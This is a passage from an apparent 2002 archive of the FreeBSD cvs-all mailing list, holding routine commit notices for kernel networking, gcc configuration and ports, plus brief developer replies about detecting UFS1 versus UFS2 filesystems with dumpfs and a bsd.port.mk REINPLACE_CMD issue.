--==_Exmh_1910483383P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 15:52:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4BF6137B40B; Fri, 21 Jun 2002 15:52:49 -0700 (PDT) Received: (from hsu@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LMqmo43196; Fri, 21 Jun 2002 15:52:48 -0700 (PDT) (envelope-from hsu) Message-Id: <200206212252.g5LMqmo43196@freefall.freebsd.org> From: Jeffrey Hsu Date: Fri, 21 Jun 2002 15:52:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/netinet tcp_subr.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG hsu 2002/06/21 15:52:48 PDT Modified files: sys/netinet tcp_subr.c Log: TCP notify functions can change the pcb list. Revision Changes Path 1.133 +2 -2 src/sys/netinet/tcp_subr.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 15:53:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C982E37B403; Fri, 21 Jun 2002 15:53:03 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LMr3G43310; Fri, 21 Jun 2002 15:53:03 -0700 (PDT) (envelope-from obrien) Message-Id: <200206212253.g5LMr3G43310@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 15:53:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/gcc/config/i386 freebsd.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 15:53:03 PDT Modified files: contrib/gcc/config/i386 freebsd.h Log: Tweaks for the 64-bit compiler. Revision Changes Path 1.56 +3 -3 src/contrib/gcc/config/i386/freebsd.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 15:55: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3237437B415; Fri, 21 Jun 2002 15:54:17 -0700 (PDT) Received: (from hsu@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LMsHN43745; Fri, 21 Jun 2002 15:54:17 -0700 (PDT) (envelope-from hsu) Message-Id: <200206212254.g5LMsHN43745@freefall.freebsd.org> From: Jeffrey Hsu Date: Fri, 21 Jun 2002 15:54:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/netinet udp_usrreq.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG hsu 2002/06/21 15:54:17 PDT Modified files: sys/netinet udp_usrreq.c Log: Fix logic which resulted in missing a call to INP_UNLOCK(). Submitted by: jlemon, mux Revision Changes Path 1.114 +2 -5 src/sys/netinet/udp_usrreq.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 15:56:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8791837B42C; Fri, 21 Jun 2002 15:54:24 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LMsO043807; Fri, 21 Jun 2002 15:54:24 -0700 (PDT) (envelope-from obrien) Message-Id: <200206212254.g5LMsO043807@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 15:54:24 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/gcc/config/i386 freebsd64.h x86-64.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 15:54:24 PDT Modified files: contrib/gcc/config/i386 freebsd64.h x86-64.h Log: Tweaks to make these files live beside our hacked config. Revision Changes Path 1.2 +12 -0 src/contrib/gcc/config/i386/freebsd64.h 1.2 +3 -11 src/contrib/gcc/config/i386/x86-64.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 16: 1: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from k6.locore.ca (k6.locore.ca [198.96.117.170]) by hub.freebsd.org (Postfix) with ESMTP id 8845C37B406; Fri, 21 Jun 2002 16:00:50 -0700 (PDT) Received: from k6.locore.ca (jake@localhost [127.0.0.1]) by k6.locore.ca (8.12.3/8.12.3) with ESMTP id g5LN3WDj044647; Fri, 21 Jun 2002 19:03:32 -0400 (EDT) (envelope-from jake@k6.locore.ca) Received: (from jake@localhost) by k6.locore.ca (8.12.3/8.12.3/Submit) id g5LN3VaC044646; Fri, 21 Jun 2002 19:03:31 -0400 (EDT) Date: Fri, 21 Jun 2002 19:03:31 -0400 From: Jake Burkholder To: "Bruce A. Mah" Cc: Kirk McKusick , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/include/protocols dumprestore.h src/lib/libstand ufs.c src/release/picobsd/build write_mfs_in_kernel.c src/sbin Makefile src/sbin/badsect badsect.c src/sbin/clri clri.c src/sbin/dump dump.h itime.c main.c optr.c tape.c traverse.c ... Message-ID: <20020621190331.D19831@locore.ca> References: <200206210618.g5L6I5w81565@freefall.freebsd.org> <200206212245.g5LMjhxT080806@intruder.bmah.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200206212245.g5LMjhxT080806@intruder.bmah.org>; from bmah@FreeBSD.org on Fri, Jun 21, 2002 at 03:45:43PM -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Apparently, On Fri, Jun 21, 2002 at 03:45:43PM -0700, Bruce A. Mah said words to the effect of; > If memory serves me right, Kirk McKusick wrote: > > > New filesystems built using newfs can be built in either > > UFS1 or UFS2 format using the -O option. In this commit UFS1 is > > the default format, so if you want to build UFS2 format filesystems, > > you must specify -O 2. > > Is there a way to find out the format of an existing filesystem? dumpfs will tell you. # dumpfs /dev/da0a magic 11954 (UFS1) time Fri Jun 21 22:54:41 2002 # dumpfs /dev/da0a magic 19540119 (UFS2) time Fri Jun 21 22:59:44 2002 Jake To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 16: 2: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from Awfulhak.org (gw.Awfulhak.org [217.204.245.18]) by hub.freebsd.org (Postfix) with ESMTP id 306FC37B409; Fri, 21 Jun 2002 16:02:01 -0700 (PDT) Received: from mail.lan.Awfulhak.org (brian@hak.Awfulhak.org [IPv6:2001:6f8:602:1::12]) by Awfulhak.org (8.12.3/8.12.3) with SMTP id g5LN1tMt040602; Sat, 22 Jun 2002 00:01:58 +0100 (BST) (envelope-from brian@Awfulhak.org) Date: Sat, 22 Jun 2002 00:01:54 +0100 From: Brian Somers To: vegacap@i.com.ua Cc: sobomax@FreeBSD.org, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/Mk bsd.port.mk Message-Id: <20020622000154.00b4d084.brian@Awfulhak.org> In-Reply-To: <3D131BEA.3CFD730D@FreeBSD.org> References: <200206190821.g5J8LRM38683@freefall.freebsd.org> <20020621011806.29559271.brian@Awfulhak.org> <3D131BEA.3CFD730D@FreeBSD.org> X-Mailer: Sylpheed version 0.7.6claws (GTK+ 1.2.10; i386-portbld-freebsd5.0) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Fri, 21 Jun 2002 15:28:26 +0300, Maxim Sobolev wrote: > Brian Somers wrote: > > > > This seemed to fail with RINPLACE_CMD being undefined when USE_REINPLACE > > is undefined and gets stuck in an infinite loop (sed_inplace seemed to > > depend on itself) when USE_REINPLACE is defined but sed_inplace isn't > > installed. > > > > Installing sed_inplace manually and then doing make -DUSE_REINPLACE worked. > > That's because you are adding -DUSE_REINPLACE into comman line (or > setting it via environment or /etc/make.conf) - it isn't intended to > be used like that. Try to build x11/XFree86-4-libraries with > -DUSE_XLIB - you will get the same effect. USE_REINPLACE should be > *only* defined in ports' Makefiles, it isn't something that the user > might need/want to set manually. The problem originally occurred when I just did a make. When USE_REINPLACE wasn't defined, I got a '-e: Bad command' type message because RINPLACE_CMD was being used but was not defined. I think the problem was when building netpbm, but it seems to work ok now. Maybe I cvsup'd at a bad time. My apologies for the false alarm. > -Maxim > > > > > On Wed, 19 Jun 2002 01:21:27 -0700 (PDT), Maxim Sobolev wrote: > > > sobomax 2002/06/19 01:21:27 PDT > > > > > > Modified files: > > > Mk bsd.port.mk > > > Log: > > > Change the way REINPLACE_CMD works - instead of using perl(1) on systems > > > where sed(1) can't do in-place editing add a new USE_REINPLACE knob, which > > > if turned on defines REINPLACE_CMD and adds textproc/sed_inplace port into > > > BUILD_DEPENDS if necessary. > > > > > > Not objected by: portmgr@ > > > > > > Revision Changes Path > > > 1.415 +11 -7 ports/Mk/bsd.port.mk > > > > -- > > Brian > > > > Don't _EVER_ lose your sense of humour ! -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 16: 3:39 2002 Delivered-To: cvs-all@freebsd.org Received: from rwcrmhc51.attbi.com (rwcrmhc51.attbi.com [204.127.198.38]) by hub.freebsd.org (Postfix) with ESMTP id EECF837B40C; Fri, 21 Jun 2002 16:03:33 -0700 (PDT) Received: from bmah.dyndns.org ([12.233.149.189]) by rwcrmhc51.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020621230333.GDGR11426.rwcrmhc51.attbi.com@bmah.dyndns.org>; Fri, 21 Jun 2002 23:03:33 +0000 Received: from intruder.bmah.org (localhost [IPv6:::1]) by bmah.dyndns.org (8.12.3/8.12.3) with ESMTP id g5LN3XkR081122; Fri, 21 Jun 2002 16:03:33 -0700 (PDT) (envelope-from bmah@intruder.bmah.org) Received: (from bmah@localhost) by intruder.bmah.org (8.12.3/8.12.3/Submit) id g5LN3XKE081121; Fri, 21 Jun 2002 16:03:33 -0700 (PDT) (envelope-from bmah) Message-Id: <200206212303.g5LN3XKE081121@intruder.bmah.org> X-Mailer: exmh version 2.5+ 20020506 with nmh-1.0.4 To: Jake Burkholder Cc: "Bruce A. Mah" , Kirk McKusick , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG Subject: Re: cvs commit: src/include/protocols dumprestore.h src/lib/libstand ufs.c src/release/picobsd/build write_mfs_in_kernel.c src/sbin Makefile src/sbin/badsect badsect.c src/sbin/clri clri.c src/sbin/dump dump.h itime.c main.c optr.c tape.c traverse.c ... In-Reply-To: <20020621190331.D19831@locore.ca> References: <200206210618.g5L6I5w81565@freefall.freebsd.org> <200206212245.g5LMjhxT080806@intruder.bmah.org> <20020621190331.D19831@locore.ca> Comments: In-reply-to Jake Burkholder message dated "Fri, 21 Jun 2002 19:03:31 -0400." From: bmah@FreeBSD.ORG (Bruce A. Mah) Reply-To: bmah@FreeBSD.ORG X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-Url: http://www.employees.org/~bmah/ Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_-1937258523P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Fri, 21 Jun 2002 16:03:33 -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --==_Exmh_-1937258523P Content-Type: text/plain; charset=us-ascii If memory serves me right, Jake Burkholder wrote: > Apparently, On Fri, Jun 21, 2002 at 03:45:43PM -0700, > > Is there a way to find out the format of an existing filesystem? > > dumpfs will tell you. Great, thanks! Bruce. --==_Exmh_-1937258523P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) Comment: Exmh version 2.5+ 20020506 iD8DBQE9E7DF2MoxcVugUsMRAg96AJ4oIsrydjbF1+g7BSJK4o+jbDUfMgCgtJfX FoVaTq2FmEFSi91IhQ3A8Tk= =at2w -----END PGP SIGNATURE----- --==_Exmh_-1937258523P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 16:17:17 2002 Delivered-To: cvs-all@freebsd.org Received: from corbulon.video-collage.com (corbulon.video-collage.com [64.35.99.179]) by hub.freebsd.org (Postfix) with ESMTP id C9D0237B408; Fri, 21 Jun 2002 16:17:12 -0700 (PDT) Received: from misha (250-217.customer.cloud9.net [168.100.250.217]) by corbulon.video-collage.com (8.12.2/8.12.2) with ESMTP id g5LNHAQC066759 (version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=FAIL); Fri, 21 Jun 2002 19:17:11 -0400 (EDT) (envelope-from mi+mx@aldan.algebra.com) X-Authentication-Warning: corbulon.video-collage.com: Host 250-217.customer.cloud9.net [168.100.250.217] claimed to be misha Content-Type: text/plain; charset="koi8-u" From: Mikhail Teterin Organization: Virtual Estates, Inc. To: bmah@FreeBSD.org, Kirk McKusick Subject: Re: cvs commit: src/include/protocols dumprestore.h src/lib/libstand ufs.c src/release/picobsd/build write_mfs_in_kernel.c src/sbin Makefile src/sbin/badsect badsect.c src/sbin/clri clri.c src/sbin/dump dump.h itime.c main.c optr.c tape.c traverse.c ... Date: Fri, 21 Jun 2002 19:16:54 -0400 X-Mailer: KMail [version 1.4] Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206210618.g5L6I5w81565@freefall.freebsd.org> <200206212245.g5LMjhxT080806@intruder.bmah.org> In-Reply-To: <200206212245.g5LMjhxT080806@intruder.bmah.org> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200206211916.54853.mi+mx@aldan.algebra.com> X-Scanned-By: MIMEDefang 2.15 (www dot roaringpenguin dot com slash mimedefang) Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Friday 21 June 2002 06:45 pm, Bruce A. Mah wrote: = If memory serves me right, Kirk McKusick wrote: = = > New filesystems built using newfs can be built in either = > UFS1 or UFS2 format using the -O option. In this commit UFS1 is = > the default format, so if you want to build UFS2 format filesystems, = > you must specify -O 2. = = Is there a way to find out the format of an existing filesystem? Also, what are the benefits of the new filesystem? Is it better (faster read/write) for BIGger partitions? Would it make sense for me to convert my 60Gb storage to it? Thanks! -mi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 16:19:54 2002 Delivered-To: cvs-all@freebsd.org Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5]) by hub.freebsd.org (Postfix) with ESMTP id EBA9837B40B; Fri, 21 Jun 2002 16:19:47 -0700 (PDT) Received: from hades.hell.gr (patr530-a165.otenet.gr [212.205.215.165]) by mailsrv.otenet.gr (8.12.3/8.12.3) with ESMTP id g5LNJiuD015581; Sat, 22 Jun 2002 02:19:45 +0300 (EEST) Received: from hades.hell.gr (hades [127.0.0.1]) by hades.hell.gr (8.12.4/8.12.4) with ESMTP id g5LNJULT005783; Sat, 22 Jun 2002 02:19:42 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Received: (from charon@localhost) by hades.hell.gr (8.12.4/8.12.4/Submit) id g5LFeuaJ003751; Fri, 21 Jun 2002 18:40:56 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Date: Fri, 21 Jun 2002 18:40:56 +0300 From: Giorgos Keramidas To: Juli Mallett Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: doc/en_US.ISO8859-1/articles/contributors article.sgml Message-ID: <20020621154056.GE3495@hades.hell.gr> References: <200206210440.g5L4el960021@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206210440.g5L4el960021@freefall.freebsd.org> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 2002-06-20 21:40 +0000, Juli Mallett wrote: > jmallett 2002/06/20 21:40:47 PDT > > Modified files: > en_US.ISO8859-1/articles/contributors article.sgml > Log: > Grr, applying diffs between revisions multiple times to try to get things > to apply cleanly ended up doubling Jeroen's entries in the developers list > rather than removing. Must remember to view a unified diff just before a > commit. Sorry. Don't be. Thanks for taking care of this. - Giorgos To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 16:21:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1890D37B410; Fri, 21 Jun 2002 16:20:14 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LNKDb55477; Fri, 21 Jun 2002 16:20:13 -0700 (PDT) (envelope-from pat) Message-Id: <200206212320.g5LNKDb55477@freefall.freebsd.org> From: Patrick Li Date: Fri, 21 Jun 2002 16:20:13 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/chinese/pycodec Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/21 16:20:13 PDT Modified files: chinese/pycodec Makefile Log: Distfile disappeared from sf.net site so maintainer will host them PR: 39629 Submitted by: maintainer Revision Changes Path 1.3 +3 -3 ports/chinese/pycodec/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 16:25: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8464737B408; Fri, 21 Jun 2002 16:24:40 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LNOek57110; Fri, 21 Jun 2002 16:24:40 -0700 (PDT) (envelope-from pat) Message-Id: <200206212324.g5LNOek57110@freefall.freebsd.org> From: Patrick Li Date: Fri, 21 Jun 2002 16:24:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/sysutils/ssync Makefile pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/21 16:24:40 PDT Modified files: sysutils/ssync Makefile pkg-descr Log: Project site moved. Fix MASTER_SITES and WWW tag PR: ports/39632 Submitted by: maintainer Revision Changes Path 1.2 +1 -1 ports/sysutils/ssync/Makefile 1.2 +1 -1 ports/sysutils/ssync/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 16:47:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C1F0337B405; Fri, 21 Jun 2002 16:47:25 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5LNlPI64263; Fri, 21 Jun 2002 16:47:25 -0700 (PDT) (envelope-from pat) Message-Id: <200206212347.g5LNlPI64263@freefall.freebsd.org> From: Patrick Li Date: Fri, 21 Jun 2002 16:47:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/apache2 Makefile pkg-plist ports/www/apache2/files patch-Makefile.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/21 16:47:25 PDT Modified files: www/apache2 Makefile pkg-plist www/apache2/files patch-Makefile.in Log: - Sync www/apache13's change (.default -> -dist) - Change default to WITH_BULDLED_EXPAT - Reorder .if .endif blocks (.if WITH_MPM must appear earlier than .if WITHOUT_CACHE) - Some minor style fixes - Bump PORTREVISION PR: ports/39635 Submitted by: maintainer Revision Changes Path 1.121 +28 -29 ports/www/apache2/Makefile 1.9 +10 -10 ports/www/apache2/files/patch-Makefile.in 1.42 +45 -45 ports/www/apache2/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 17:15:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C2A9837B400; Fri, 21 Jun 2002 17:15:41 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M0Ff277268; Fri, 21 Jun 2002 17:15:41 -0700 (PDT) (envelope-from obrien) Message-Id: <200206220015.g5M0Ff277268@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 17:15:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/mutt Makefile distinfo pkg-plist ports/mail/mutt/files patch-02 patch-05 patch-charmaps.Makefile.am patch-configure.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 17:15:41 PDT Modified files: mail/mutt Makefile distinfo pkg-plist mail/mutt/files patch-02 patch-05 patch-configure.in Removed files: mail/mutt/files patch-charmaps.Makefile.am Log: Upgrade to version 1.4[.0]. Revision Changes Path 1.114 +24 -12 ports/mail/mutt/Makefile 1.55 +3 -3 ports/mail/mutt/distinfo 1.8 +13 -18 ports/mail/mutt/files/patch-02 1.11 +6 -6 ports/mail/mutt/files/patch-05 1.2 +0 -14 ports/mail/mutt/files/patch-charmaps.Makefile.am (dead) 1.2 +26 -6 ports/mail/mutt/files/patch-configure.in 1.25 +21 -166 ports/mail/mutt/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 17:18:14 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B878837B40E; Fri, 21 Jun 2002 17:18:12 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M0ICJ78076; Fri, 21 Jun 2002 17:18:12 -0700 (PDT) (envelope-from obrien) Message-Id: <200206220018.g5M0ICJ78076@freefall.freebsd.org> From: "David E. O'Brien" Date: Fri, 21 Jun 2002 17:18:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security/ssh Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/21 17:18:12 PDT Modified files: security/ssh Makefile Log: Use libgmp4 rather than libgmp-freebsd. Revision Changes Path 1.115 +1 -1 ports/security/ssh/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 18:26: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EAFC937B40F; Fri, 21 Jun 2002 18:26:02 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M1Q2m02368; Fri, 21 Jun 2002 18:26:02 -0700 (PDT) (envelope-from alc) Message-Id: <200206220126.g5M1Q2m02368@freefall.freebsd.org> From: Alan Cox Date: Fri, 21 Jun 2002 18:26:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_glue.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/21 18:26:02 PDT Modified files: sys/vm vm_glue.c Log: o Remove GIANT_REQUIRED from vslock(). o Annotate kernacc(), useracc(), and vslock() as MPSAFE. Motivated by: alfred Revision Changes Path 1.137 +10 -1 src/sys/vm/vm_glue.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 18:42:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7F98C37B40B; Fri, 21 Jun 2002 18:42:26 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5M1gQR07165; Fri, 21 Jun 2002 18:42:26 -0700 (PDT) (envelope-from tjr) Message-Id: <200206220142.g5M1gQR07165@freefall.freebsd.org> From: "Tim J. Robbins" Date: Fri, 21 Jun 2002 18:42:26 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/sed main.c process.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/21 18:42:26 PDT Modified files: usr.bin/sed main.c process.c Log: Don't store newlines at the end of each line in the hold/pattern spaces, instead add the newline when the pattern space is printed. Make the `G' and `H' commands add a newline to the space before the data, remove bogus addition of newline from `x' command. PR: 29790, 38195 Revision Changes Path 1.25 +2 -0 src/usr.bin/sed/main.c 1.21 +10 -11 src/usr.bin/sed/process.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 18:44:36 2002 Delivered-To: cvs-all@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 931) id B0EE537B40C; Fri, 21 Jun 2002 18:44:33 -0700 (PDT) Date: Fri, 21 Jun 2002 18:44:33 -0700 From: Juli Mallett To: "Tim J. Robbins" Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/sed main.c process.c Message-ID: <20020621184433.A23670@FreeBSD.ORG> References: <200206220142.g5M1gQR07165@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206220142.g5M1gQR07165@freefall.freebsd.org>; from tjr@FreeBSD.org on Fri, Jun 21, 2002 at 06:42:26PM -0700 Organisation: The FreeBSD Project X-Alternate-Addresses: , , , X-Affiliated-Projects: FreeBSD, xMach, ircd-hybrid-7 X-Towel: Yes Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: 